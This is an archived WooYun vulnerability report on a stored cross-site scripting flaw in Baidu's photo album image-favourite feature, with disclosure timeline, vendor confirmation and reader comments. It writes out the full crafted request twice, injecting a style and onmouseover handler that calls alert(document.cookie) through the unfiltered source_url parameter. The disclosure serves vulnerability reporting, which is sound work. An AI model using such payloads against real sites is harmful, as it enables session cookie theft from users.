当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044031

漏洞标题:百度相册存储型XSS漏洞

相关厂商:百度

漏洞作者: q601333824

提交时间:2013-11-26 09:01

修复时间:2014-01-10 09:02

公开时间:2014-01-10 09:02

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:2

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-26: 细节已通知厂商并且等待厂商处理中
2013-11-26: 厂商已经确认,细节仅向厂商公开
2013-12-06: 细节向核心白帽子及相关领域专家公开
2013-12-16: 细节向普通白帽子公开
2013-12-26: 细节向实习白帽子公开
2014-01-10: 细节向公众公开

简要描述:

百度相册,某处未做过滤,存在XSS跨站

详细说明:

1.百度贴吧有个收藏图片的功能


2.点击收藏图片,截获请求,已收藏

1.png


3.这是一个get请求

2.png


4.复制这个请求连接到文本

3.png



5.这个参数&source_url=没有对"引号作过滤,可以构造xss,style属性设置一下全屏鼠标移动触发XSS

4.png


(构造好的请求)
http://up.xiangce.baidu.com/opencom/picture/fav/upload?app_id=314406&descript=缃伓鐜嫔啝&uid=448557988&source_url=http://tieba.baidu.com/f?kw=%E7%BD%81%B6%E7%8E%E6%C9%86%A0&from=prinaaaa"style="left: 0px; top: -8px; width: 100%; height: 100%; position: fixed; cursor: default !important;"onmouseover="alert(document.cookie)">&tags=百度贴吧,缃伓鐜嫔啝吧&url=http://imgsrc.baidu.com/forum/w%3D580%3B/sign=028792f753da81cb4ee683c5625dd116/b64543a98226cffcb1fec5b1bb014a90f703ead9.jpg&callback=jQuery17205619738968089223_1385372203420&_=1385372252309
6.然后访问一下

5.png


7.点击查看图片的时候就弹出来了

6.png


(这个cook没啥用,..............)

cf1b9d16fdfaaf515b4b53748d5494eef11f7a55.jpg


6.有漏洞的功能位置,代码存在的位置,图上圈圈

7.png


漏洞证明:

1.

1.png



2.

2.png



3.

3.png


4.

4.png


5.http://up.xiangce.baidu.com/opencom/picture/fav/upload?app_id=314406&descript=%E7%BC%83%E4%BC%93%E9%90%9C%E5%AB%94%E5%95%9D&uid=448557988&source_url=http%3A%2F%2Ftieba.baidu.com%2Ff%3Fkw%3D%25E7%25BD%2581%25B6%25E7%258E%25E6%25C9%2586%25A0%26from%3Dprinaaaa"style="left: 0px; top: -8px; width: 100%; height: 100%; position: fixed; cursor: default !important;"onmouseover="alert(document.cookie)">&tags=%E7%99%BE%E5%BA%A6%E8%B4%B4%E5%90%A7%2C%E7%BC%83%E4%BC%93%E9%90%9C%E5%AB%94%E5%95%9D%E5%90%A7&url=http%3A%2F%2Fimgsrc.baidu.com%2Fforum%2Fw%253D580%253B%2Fsign%3D028792f753da81cb4ee683c5625dd116%2Fb64543a98226cffcb1fec5b1bb014a90f703ead9.jpg&callback=jQuery17205619738968089223_1385372203420&_=1385372252309
6.

5.png


7.

6.png


8.

7.png

修复方案:

过滤

版权声明:转载请注明来源 q601333824@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2013-11-26 14:05

厂商回复:

感谢提交,安全组会尽快联系业务部门处理此问题。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-26 10:23 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    纳尼?

  2. 2013-11-26 13:33 | 熊猫 ( 实习白帽子 | Rank:64 漏洞数:33 | panda)

    ~~~

  3. 2013-12-16 17:53 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    self-xss??

  4. 2013-12-16 23:29 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    桌面是H漫吗

  5. 2013-12-17 12:20 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    @wefgod ...约会大作战

  6. 2013-12-17 16:07 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @q601333824 哈哈,我开玩笑的

  7. 2014-01-10 18:14 | 病狗 ( 路人 | Rank:0 漏洞数:2 | www.wooyun.org)

    lz,淫荡啊。。。